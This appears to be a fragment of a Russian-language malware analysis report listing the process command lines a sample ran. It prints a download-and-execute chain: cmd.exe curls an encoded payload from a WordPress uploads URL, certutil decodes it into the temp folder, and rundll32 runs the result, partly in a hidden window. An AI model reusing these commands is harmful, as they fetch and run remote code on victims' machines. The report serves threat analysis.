Техническая информация
- '<SYSTEM32>\cmd.exe' /c curl "https://culinarycaptain.com/wp-content/uploads/wp-logs/category.php?uid=1" -o "%temp%\l.t"&certutil -decode "%temp%\l.t" "%temp%\lpk.tmp"&cmd /c del "%temp%\l.t"&timeout 60&rundll32 "%...
- '<SYSTEM32>\cmd.exe' /c curl "https://culinarycaptain.com/wp-content/uploads/wp-logs/category.php?uid=1" -o "%temp%\l.t"&certutil -decode "%temp%\l.t" "%temp%\lpk.tmp"&cmd /c del "%temp%\l.t"&timeout 60&rundll32 "%...' (со скрытым окном)
- '<SYSTEM32>\certutil.exe' -decode "%TEMP%\l.t" "%TEMP%\lpk.tmp"
- '<SYSTEM32>\cmd.exe' /c del "%TEMP%\l.t"
- '<SYSTEM32>\timeout.exe' 60
- '<SYSTEM32>\rundll32.exe' "%TEMP%\lpk.tmp",yIZBJIXpO0295wBr776xRMvCyOqI9bbX1dG15M